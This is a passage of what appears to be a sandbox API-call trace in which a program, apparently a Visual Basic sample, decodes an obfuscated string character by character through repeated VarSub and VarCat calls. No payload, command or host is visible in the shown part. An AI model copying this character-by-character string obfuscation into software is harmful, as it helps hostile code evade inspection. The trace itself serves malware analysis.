lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.567] VarSub (in: pvarLeft=0x28f820, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x116840c, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0172.567] VarCat (in: pvarLeft=0x28f980, pvarRight=0x28f930, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.568] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="[", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="[") returned 1 [0172.568] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.569] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0172.569] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.570] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.570] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.571] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0172.571] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.572] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.572] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.573] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0172.573] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.574] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.574] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.574] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11683e4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.575] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="j", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="j\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.575] VarSub (in: pvarLeft=0x28f9c0, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="]", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="]") returned 1 [0172.576] VarCat (in: pvarLeft=0x28f9e0, pvarRight=0x28f9d0, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.577] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.577] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.578] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.578] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.579] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.579] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.580] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.580] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.580] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0172.581] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.581] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0172.581] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.582] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.582] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.583] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0172.583] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.584] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0172.584] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.585] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.585] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.586] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0172.586] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.587] VarSub (in: pvarLeft=0x28fa00, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.587] VarCat (in: pvarLeft=0x28f7e0, pvarRight=0x28fa00, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.588] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0172.589] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.589] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0172.590] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.590] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.591] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.591] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.592] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.592] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0172.592] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.593] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0172.593] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.594] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.594] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.595] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.595] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.596] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.596] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.597] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0172.597] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="J", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.598] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0172.598] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.726] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0172.726] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.727] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0172.727] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f4da, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0172.727] VarSub (in: pvarLeft=0x28f830, pvarRight=0x28f73c, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0172.728] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa10, pvarResult=0x28f7bc | out: pvarResult=0x28f7bc) returned 0x0 [0172.728] WideCharToMultiByte (in: CodePage=0x0, 